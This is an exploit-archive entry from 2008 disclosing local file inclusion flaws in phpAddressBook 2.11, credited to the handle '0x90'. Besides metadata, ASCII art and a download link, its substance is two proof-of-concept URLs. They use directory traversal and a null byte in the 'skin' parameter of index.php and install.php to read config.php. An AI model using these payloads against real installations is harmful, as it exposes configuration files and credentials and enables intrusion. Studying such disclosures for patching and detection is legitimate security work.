phpAddressBook 2.11 Multiple Local File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpAddressBook 2.11 Multiple Local File Inclusion Vulnerabilities
# Published : 2008-03-21
# Author : 0x90
# Previous Title : Cuteflow Bin 1.5.0 (login.php) Local File Inclusion Vulnerability
# Next Title : RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability

/  _   /  / / _   /  _  
      | | | |  / / ||_| | | | | |
      | | | |    /  _   | | | | |
      | |_| |  /     __ | | |_| |
      _____/ / /  |____/ _____/
              /  /


[~] phpAddressBook v2.11 Multiple Local File Inclusion Vulnerabilities

[~] Download: http://downloads.coronamatrix.org/phpAddressBookv2.11.zip

[~] Founder: 0x90

[~] HomePage: www.0x90.com.ar

[~] Public: http://0x90.com.ar/Advisory/20080321.txt

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] PoC:

   http://[host]/[path]/index.php?skin=/../config.php %00
   http://[host]/[path]/install.php?skin=/../config.php %00


Greetz: ...

# www.Syue.com [2008-03-21]